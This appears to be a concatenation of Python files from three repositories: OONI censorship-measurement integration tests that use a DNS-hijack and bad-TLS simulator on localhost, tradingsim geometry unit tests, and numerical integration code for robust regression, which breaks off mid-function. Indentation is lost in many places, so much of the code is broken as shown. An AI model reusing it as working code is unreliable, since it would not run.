        assert "certificate verify failed" in tk["http_experiment_failure"]
    assert tk["body_length_match"] is None
    assert tk["body_proportion"] == 0
    assert tk["status_code_match"] is None
    assert tk["headers_match"] is None
    assert tk["title_match"] is None
    # The following strikes me as a measurement_kit bug. We are saying
    # that all is good with a domain even though we don't know why the
    # control failed and the domain is clearly not accessible according
    # to our measurement of it (certificate expired).
    #
    # See <https://github.com/ooni/probe-engine/issues/858>.
    if "miniooni" in ooni_exe:
        assert tk["blocking"] is None
        assert tk["accessible"] is None
    else:
        assert tk["blocking"] is False
        assert tk["accessible"] is True
assert_status_flags_are(ooni_exe, tk, 16)
def webconnectivity_https_wrong_host(ooni_exe, outfile):
""" Test case where the hostname is wrong for the certificate """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://wrong.host.badssl.com/ web_connectivity",
"webconnectivity_https_wrong_host",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "consistent"
    assert tk["control_failure"] is None
    if "miniooni" in ooni_exe:
        assert tk["http_experiment_failure"] == "ssl_invalid_hostname"
    else:
        assert "certificate verify failed" in tk["http_experiment_failure"]
    assert tk["body_length_match"] is None
    assert tk["body_proportion"] == 0
    assert tk["status_code_match"] is None
    assert tk["headers_match"] is None
    assert tk["title_match"] is None
    # The following strikes me as a measurement_kit bug. We are saying
    # that all is good with a domain even though we don't know why the
    # control failed and the domain is clearly not accessible according
    # to our measurement of it (wrong host for certificate).
    #
    # See <https://github.com/ooni/probe-engine/issues/858>.
    if "miniooni" in ooni_exe:
        assert tk["blocking"] is None
        assert tk["accessible"] is None
    else:
        assert tk["blocking"] is False
        assert tk["accessible"] is True
assert_status_flags_are(ooni_exe, tk, 16)
def webconnectivity_https_self_signed(ooni_exe, outfile):
""" Test case where the certificate is self signed """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://self-signed.badssl.com/ web_connectivity",
"webconnectivity_https_self_signed",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "consistent"
    assert tk["control_failure"] is None
    if "miniooni" in ooni_exe:
        assert tk["http_experiment_failure"] == "ssl_unknown_authority"
    else:
        assert "certificate verify failed" in tk["http_experiment_failure"]
    assert tk["body_length_match"] is None
    assert tk["body_proportion"] == 0
    assert tk["status_code_match"] is None
    assert tk["headers_match"] is None
    assert tk["title_match"] is None
    # The following strikes me as a measurement_kit bug. We are saying
    # that all is good with a domain even though we don't know why the
    # control failed and the domain is clearly not accessible according
    # to our measurement of it (self-signed certificate).
    #
    # See <https://github.com/ooni/probe-engine/issues/858>.
    if "miniooni" in ooni_exe:
        assert tk["blocking"] is None
        assert tk["accessible"] is None
    else:
        assert tk["blocking"] is False
        assert tk["accessible"] is True
assert_status_flags_are(ooni_exe, tk, 16)
def webconnectivity_https_untrusted_root(ooni_exe, outfile):
""" Test case where the certificate has an untrusted root """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://untrusted-root.badssl.com/ web_connectivity",
"webconnectivity_https_untrusted_root",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "consistent"
    assert tk["control_failure"] is None
    if "miniooni" in ooni_exe:
        assert tk["http_experiment_failure"] == "ssl_unknown_authority"
    else:
        assert "certificate verify failed" in tk["http_experiment_failure"]
    assert tk["body_length_match"] is None
    assert tk["body_proportion"] == 0
    assert tk["status_code_match"] is None
    assert tk["headers_match"] is None
    assert tk["title_match"] is None
    # The following strikes me as a measurement_kit bug. We are saying
    # that all is good with a domain even though we don't know why the
    # control failed and the domain is clearly not accessible according
    # to our measurement of it (untrusted root certificate).
    #
    # See <https://github.com/ooni/probe-engine/issues/858>.
    if "miniooni" in ooni_exe:
        assert tk["blocking"] is None
        assert tk["accessible"] is None
    else:
        assert tk["blocking"] is False
        assert tk["accessible"] is True
assert_status_flags_are(ooni_exe, tk, 16)
def webconnectivity_dns_blocking_nxdomain(ooni_exe, outfile):
""" Test case where there is blocking using NXDOMAIN """
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-block",
"example.com",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.com/ web_connectivity",
"webconnectivity_dns_blocking_nxdomain",
args,
)
    # The following seems to be a bug in MK, where we don't properly record
    # the actual error that occurred when performing the DNS experiment.
    #
    # See <https://github.com/measurement-kit/measurement-kit/issues/1931>.
    if "miniooni" in ooni_exe:
        assert tk["dns_experiment_failure"] == "dns_nxdomain_error"
    else:
        assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "inconsistent"
    assert tk["control_failure"] is None
    if "miniooni" in ooni_exe:
        assert tk["http_experiment_failure"] is None
    else:
        assert tk["http_experiment_failure"] == "dns_lookup_error"
    assert tk["body_length_match"] is None
    assert tk["body_proportion"] == 0
    assert tk["status_code_match"] is None
    assert tk["headers_match"] is None
    assert tk["title_match"] is None
    assert tk["blocking"] == "dns"
    assert tk["accessible"] is False
assert_status_flags_are(ooni_exe, tk, 2080)
def webconnectivity_https_unknown_authority_with_inconsistent_dns(ooni_exe, outfile):
""" Test case where the DNS is sending us towards a website where
we're served an invalid certificate """
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"example.org",
"-bad-proxy-address-tls",
"127.0.0.1:443",
"-tls-proxy-address",
"127.0.0.1:4114",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.org/ web_connectivity",
"webconnectivity_https_unknown_authority_with_inconsistent_dns",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "inconsistent"
    assert tk["control_failure"] is None
    if "miniooni" in ooni_exe:
        assert tk["http_experiment_failure"] == "ssl_unknown_authority"
    else:
        assert "certificate verify failed" in tk["http_experiment_failure"]
    assert tk["body_length_match"] is None
    assert tk["body_proportion"] == 0
    assert tk["status_code_match"] is None
    assert tk["headers_match"] is None
    assert tk["title_match"] is None
    assert tk["blocking"] == "dns"
    assert tk["accessible"] is False
assert_status_flags_are(ooni_exe, tk, 9248)
def main():
if len(sys.argv) != 2:
sys.exit("usage: %s /path/to/ooniprobelegacy-like/binary" % sys.argv[0])
outfile = "webconnectivity.jsonl"
ooni_exe = sys.argv[1]
tests = [
webconnectivity_https_ok_with_control_failure,
webconnectivity_http_ok_with_control_failure,
webconnectivity_transparent_http_proxy,
webconnectivity_dns_hijacking,
webconnectivity_control_unreachable_and_using_http,
webconnectivity_nonexistent_domain,
webconnectivity_tcpip_blocking_with_consistent_dns,
webconnectivity_tcpip_blocking_with_inconsistent_dns,
webconnectivity_http_connection_refused_with_consistent_dns,
webconnectivity_http_connection_reset_with_consistent_dns,
webconnectivity_http_nxdomain_with_consistent_dns,
webconnectivity_http_eof_error_with_consistent_dns,
webconnectivity_http_generic_timeout_error_with_consistent_dns,
webconnectivity_http_connection_reset_with_inconsistent_dns,
webconnectivity_http_successful_website,
webconnectivity_https_successful_website,
webconnectivity_http_diff_with_inconsistent_dns,
webconnectivity_http_diff_with_consistent_dns,
webconnectivity_https_expired_certificate,
webconnectivity_https_wrong_host,
webconnectivity_https_self_signed,
webconnectivity_https_untrusted_root,
webconnectivity_dns_blocking_nxdomain,
webconnectivity_https_unknown_authority_with_inconsistent_dns,
]
for test in tests:
test(ooni_exe, outfile)
time.sleep(7)
if __name__ == "__main__":
main()
# --- tests/TestUtils.py (repo: DaveTCode/tradingsim, license: MIT) ---
import unittest
import tradingsim.utils as utils
class TestUtils(unittest.TestCase):
def test_is_point_on_line_segment(self):
# Normal line
self.assertEqual(utils.is_point_on_line_segment(1, 1, 3, 3, 2, 2), True)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 3, 3, 2, 3), False)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 3, 3, 4, 4), False)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 3, 3, -1, -1), False)
# Backwards line
self.assertEqual(utils.is_point_on_line_segment(3, 3, 1, 1, 2, 2), True)
self.assertEqual(utils.is_point_on_line_segment(3, 3, 1, 1, 2, 3), False)
self.assertEqual(utils.is_point_on_line_segment(3, 3, 1, 1, 4, 4), False)
self.assertEqual(utils.is_point_on_line_segment(3, 3, 1, 1, 0, 0), False)
# Vertical line
self.assertEqual(utils.is_point_on_line_segment(1, 1, 1, 100, 1, 99), True)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 1, 100, 2, 99), False)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 1, 100, 1, 101), False)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 1, 100, 1, -10), False)
# Vertical upside down line
self.assertEqual(utils.is_point_on_line_segment(1, 100, 1, 1, 1, 99), True)
self.assertEqual(utils.is_point_on_line_segment(1, 100, 1, 1, 2, 99), False)
self.assertEqual(utils.is_point_on_line_segment(1, 100, 1, 1, 1, 101), False)
self.assertEqual(utils.is_point_on_line_segment(1, 100, 1, 1, 1, -10), False)
# --- src/numerical_functions.py (repo: superporchetta/robust_linear_regression, license: MIT) ---
import numpy as np
from scipy.integrate import dblquad
from numba import njit, vectorize
from src.integration_utils import (
find_integration_borders_square,
divide_integration_borders_grid,
domains_double_line_constraint,
domains_double_line_constraint_only_inside,
)
MULT_INTEGRAL = 10
EPSABS = 1e-9
EPSREL = 1e-9
@njit(error_model="numpy", fastmath=True)
def ZoutBayes_single_noise(y, omega, V, delta):
return np.exp(-((y - omega) ** 2) / (2 * (V + delta))) / np.sqrt(
2 * np.pi * (V + delta)
)
@njit(error_model="numpy", fastmath=True)
def foutBayes_single_noise(y, omega, V, delta):
return (y - omega) / (V + delta)
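Throughout this file, each fout is the derivative of log Zout with respect to omega. As a sanity check, here is a minimal plain-Python sketch (no numba) verifying that identity for the single-noise channel by central finite differences; `Zout` and `fout` below are stand-ins mirroring the two functions above, and the numeric values are arbitrary:

```python
import numpy as np

def Zout(y, omega, V, delta):
    # single-noise partition function, as in ZoutBayes_single_noise
    return np.exp(-(y - omega) ** 2 / (2 * (V + delta))) / np.sqrt(2 * np.pi * (V + delta))

def fout(y, omega, V, delta):
    # as in foutBayes_single_noise
    return (y - omega) / (V + delta)

y, omega, V, delta = 0.7, 0.2, 0.5, 0.1
h = 1e-6
# central finite difference of log Zout in omega
numeric = (np.log(Zout(y, omega + h, V, delta)) - np.log(Zout(y, omega - h, V, delta))) / (2 * h)
print(abs(numeric - fout(y, omega, V, delta)) < 1e-8)  # True
```

Because log Zout is quadratic in omega, the central difference here is exact up to floating-point error.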
@njit(error_model="numpy", fastmath=True)
def ZoutBayes_double_noise(y, omega, V, delta_small, delta_large, eps):
return (1 - eps) * np.exp(-((y - omega) ** 2) / (2 * (V + delta_small))) / np.sqrt(
2 * np.pi * (V + delta_small)
) + eps * np.exp(-((y - omega) ** 2) / (2 * (V + delta_large))) / np.sqrt(
2 * np.pi * (V + delta_large)
)
@njit(error_model="numpy", fastmath=True)
def foutBayes_double_noise(y, omega, V, delta_small, delta_large, eps):
small_exponential = np.exp(-((y - omega) ** 2) / (2 * (V + delta_small)))
large_exponential = np.exp(-((y - omega) ** 2) / (2 * (V + delta_large)))
return (
(y - omega)
* (
(1 - eps) * small_exponential / np.power(V + delta_small, 3 / 2)
+ eps * large_exponential / np.power(V + delta_large, 3 / 2)
)
/ (
(1 - eps) * small_exponential / np.power(V + delta_small, 1 / 2)
+ eps * large_exponential / np.power(V + delta_large, 1 / 2)
)
)
@njit(error_model="numpy", fastmath=True)
def ZoutBayes_decorrelated_noise(y, omega, V, delta_small, delta_large, eps, beta):
    return (1 - eps) * np.exp(-((y - omega) ** 2) / (2 * (V + delta_small))) / np.sqrt(
        2 * np.pi * (V + delta_small)
    ) + eps * np.exp(-((y - beta * omega) ** 2) / (2 * (beta ** 2 * V + delta_large))) / np.sqrt(
        2 * np.pi * (beta ** 2 * V + delta_large)
    )
@njit(error_model="numpy", fastmath=True)
def foutBayes_decorrelated_noise(y, omega, V, delta_small, delta_large, eps, beta):
small_exponential = np.exp(-((y - omega) ** 2) / (2 * (V + delta_small)))
    large_exponential = np.exp(-((y - beta * omega) ** 2) / (2 * (beta ** 2 * V + delta_large)))
return (
(
(y - omega) * (1 - eps) * small_exponential / np.power(V + delta_small, 3 / 2)
+ eps * beta * (y - beta * omega) * large_exponential / np.power(beta ** 2 * V + delta_large, 3 / 2)
)
/ (
(1 - eps) * small_exponential / np.power(V + delta_small, 1 / 2)
+ eps * large_exponential / np.power(beta ** 2 * V + delta_large, 1 / 2)
)
)
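A useful consistency check on the definitions above: at beta = 1 the decorrelated-noise channel reduces to the double-noise one. A minimal plain-NumPy sketch (stand-ins for ZoutBayes_double_noise and ZoutBayes_decorrelated_noise; the numeric values are arbitrary):

```python
import numpy as np

def Z_double(y, omega, V, ds, dl, eps):
    # mixture of two Gaussians with variances V + ds and V + dl
    return (1 - eps) * np.exp(-(y - omega) ** 2 / (2 * (V + ds))) / np.sqrt(2 * np.pi * (V + ds)) \
        + eps * np.exp(-(y - omega) ** 2 / (2 * (V + dl))) / np.sqrt(2 * np.pi * (V + dl))

def Z_decorr(y, omega, V, ds, dl, eps, beta):
    # second component has mean beta * omega and variance beta**2 * V + dl
    return (1 - eps) * np.exp(-(y - omega) ** 2 / (2 * (V + ds))) / np.sqrt(2 * np.pi * (V + ds)) \
        + eps * np.exp(-(y - beta * omega) ** 2 / (2 * (beta ** 2 * V + dl))) / np.sqrt(2 * np.pi * (beta ** 2 * V + dl))

y, omega, V, ds, dl, eps = 0.4, -0.3, 0.6, 0.1, 5.0, 0.3
print(np.isclose(Z_decorr(y, omega, V, ds, dl, eps, beta=1.0), Z_double(y, omega, V, ds, dl, eps)))  # True
```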
# -------
@njit(error_model="numpy", fastmath=True)
def foutL2(y, omega, V):
return (y - omega) / (1 + V)
@njit(error_model="numpy", fastmath=True)
def DfoutL2(y, omega, V):
return -1.0 / (1 + V)
@njit(error_model="numpy", fastmath=True)
def foutL1(y, omega, V):
return (y - omega + np.sign(omega - y) * np.maximum(np.abs(omega - y) - V, 0.0)) / V
@njit(error_model="numpy", fastmath=True)
def DfoutL1(y, omega, V):
if np.abs(omega - y) > V:
return 0.0
else:
return -1.0 / V
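foutL1 acts like a soft-thresholded residual: linear in (y - omega) inside the band |y - omega| <= V and saturating at sign(y - omega) outside it, which is exactly where DfoutL1 switches between -1/V and 0. A small plain-NumPy illustration (arbitrary values):

```python
import numpy as np

def foutL1(y, omega, V):
    # same expression as the @njit version above
    return (y - omega + np.sign(omega - y) * np.maximum(np.abs(omega - y) - V, 0.0)) / V

# inside the band |y - omega| <= V the response is linear in the residual ...
print(foutL1(0.3, 0.0, 1.0))   # 0.3  -> (y - omega) / V
# ... and outside it saturates at sign(y - omega)
print(foutL1(5.0, 0.0, 1.0))   # 1.0
print(foutL1(-5.0, 0.0, 1.0))  # -1.0
```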
@vectorize
def foutHuber(y, omega, V, a):
if a + a * V + omega < y:
return a
elif np.abs(y - omega) <= a + a * V:
return (y - omega) / (1 + V)
elif omega > a + a * V + y:
return -a
else:
return 0.0
@vectorize
def DfoutHuber(y, omega, V, a):
if (y < omega and a + a * V + y < omega) or (a + a * V + omega < y):
return 0.0
else:
return -1.0 / (1 + V)
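foutHuber matches foutL2 for residuals of magnitude up to a * (1 + V) and is clipped at ±a beyond that, consistent with where DfoutHuber above vanishes. A minimal scalar sketch of the same branches (arbitrary values):

```python
def foutHuber(y, omega, V, a):
    # same branch structure as the @vectorize version above
    if a + a * V + omega < y:
        return a
    elif abs(y - omega) <= a + a * V:
        return (y - omega) / (1 + V)
    elif omega > a + a * V + y:
        return -a
    else:
        return 0.0

# small residual: same as foutL2 = (y - omega) / (1 + V)
print(foutHuber(0.5, 0.0, 1.0, 1.0))   # 0.25
# large positive / negative residual: clipped at +a / -a
print(foutHuber(5.0, 0.0, 1.0, 1.0))   # 1.0
print(foutHuber(-5.0, 0.0, 1.0, 1.0))  # -1.0
```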
# --------------
# Functions to integrate - Single Noise
# --------------
@njit(error_model="numpy", fastmath=True)
def q_integral_BO_single_noise(y, xi, q, m, sigma, delta):
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(q) * xi, 1 - q, delta)
* (foutBayes_single_noise(y, np.sqrt(q) * xi, 1 - q, delta) ** 2)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_L2_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutL2(y, np.sqrt(q) * xi, sigma)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_L2_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* (foutL2(y, np.sqrt(q) * xi, sigma) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_L2_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* DfoutL2(y, np.sqrt(q) * xi, sigma)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_L1_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutL1(y, np.sqrt(q) * xi, sigma)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_L1_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* (foutL1(y, np.sqrt(q) * xi, sigma) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_L1_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* DfoutL1(y, np.sqrt(q) * xi, sigma)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutHuber(y, np.sqrt(q) * xi, sigma, a)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* (foutHuber(y, np.sqrt(q) * xi, sigma, a) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* DfoutHuber(y, np.sqrt(q) * xi, sigma, a)
)
# --------------
# Functions to integrate - Double Noise
# --------------
@njit(error_model="numpy", fastmath=True)
def q_integral_BO_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps):
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(q) * xi, (1 - q), delta_small, delta_large, eps
)
* (
foutBayes_double_noise(
y, np.sqrt(q) * xi, (1 - q), delta_small, delta_large, eps
)
** 2
)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_L2_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* foutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* foutL2(y, np.sqrt(q) * xi, sigma)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_L2_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* (foutL2(y, np.sqrt(q) * xi, sigma) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_L2_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* DfoutL2(y, np.sqrt(q) * xi, sigma)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_Huber_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* foutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* foutHuber(y, np.sqrt(q) * xi, sigma, a)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_Huber_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* (foutHuber(y, np.sqrt(q) * xi, sigma, a) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_Huber_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, a
):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* DfoutHuber(y, np.sqrt(q) * xi, sigma, a)
)
# --------------
# Functions to integrate - Decorrelated Noise
# --------------
@njit(error_model="numpy", fastmath=True)
def q_integral_BO_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta):
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(q) * xi, (1 - q), delta_small, delta_large, eps, beta
)
* (
foutBayes_decorrelated_noise(
y, np.sqrt(q) * xi, (1 - q), delta_small, delta_large, eps, beta
)
** 2
)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_L2_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* foutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* foutL2(y, np.sqrt(q) * xi, sigma)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_L2_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* (foutL2(y, np.sqrt(q) * xi, sigma) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_L2_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* DfoutL2(y, np.sqrt(q) * xi, sigma)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_Huber_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* foutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* foutHuber(y, np.sqrt(q) * xi, sigma, a)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_Huber_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* (foutHuber(y, np.sqrt(q) * xi, sigma, a) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_Huber_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a
):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* DfoutHuber(y, np.sqrt(q) * xi, sigma, a)
)
# -----------
def border_plus_L1(xi, m, q, sigma):
return np.sqrt(q) * xi + sigma
def border_minus_L1(xi, m, q, sigma):
return np.sqrt(q) * xi - sigma
def test_fun_upper_L1(y, m, q, sigma):
return (y - sigma) / np.sqrt(q)
def test_fun_down_L1(y, m, q, sigma):
return (y + sigma) / np.sqrt(q)
def border_plus_Huber(xi, m, q, sigma, a):
return np.sqrt(q) * xi + a * (sigma + 1)
def border_minus_Huber(xi, m, q, sigma, a):
return np.sqrt(q) * xi - a * (sigma + 1)
def test_fun_upper_Huber(y, m, q, sigma, a):
return 1 / np.sqrt(q) * (-a * (sigma + 1) + y)
def test_fun_down_Huber(y, m, q, sigma, a):
return 1 / np.sqrt(q) * (a * (sigma + 1) + y)
# ------------------
# BayesOpt equations single noise
# ------------------
def q_hat_equation_BO_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_BO_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
return dblquad(
q_integral_BO_single_noise,
borders[0][0],
borders[0][1],
borders[1][0],
borders[1][1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
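Since ZoutBayes_single_noise is a normalized density in y, integrating the Gaussian measure over xi times Zout should give 1; this provides a cheap sanity check of the dblquad setup. A self-contained sketch (a plain re-implementation of the integrand, a fixed box instead of find_integration_borders_square, arbitrary q and delta):

```python
import numpy as np
from scipy.integrate import dblquad

def integrand(y, xi, q, delta):
    # Gaussian measure in xi times the single-noise partition function at V = 1 - q
    V = 1 - q
    Z = np.exp(-(y - np.sqrt(q) * xi) ** 2 / (2 * (V + delta))) / np.sqrt(2 * np.pi * (V + delta))
    return np.exp(-xi ** 2 / 2) / np.sqrt(2 * np.pi) * Z

# integrate over a box large enough that the tail mass is negligible
val, _ = dblquad(integrand, -10, 10, -10, 10, args=(0.5, 0.1))
print(abs(val - 1.0) < 1e-6)  # True
```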
# ------------------
# L2 equations single noise
# ------------------
def m_hat_equation_L2_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: m_integral_L2_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
return dblquad(
m_integral_L2_single_noise,
borders[0][0],
borders[0][1],
borders[1][0],
borders[1][1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
def q_hat_equation_L2_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_L2_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
return dblquad(
q_integral_L2_single_noise,
borders[0][0],
borders[0][1],
borders[1][0],
borders[1][1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
def sigma_hat_equation_L2_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_L2_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
return dblquad(
sigma_integral_L2_single_noise,
borders[0][0],
borders[0][1],
borders[1][0],
borders[1][1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
# ------------------
# L1 equations single noise
# ------------------
def m_hat_equation_L1_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: m_integral_L1_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma}
domain_xi, domain_y = domains_double_line_constraint(
borders,
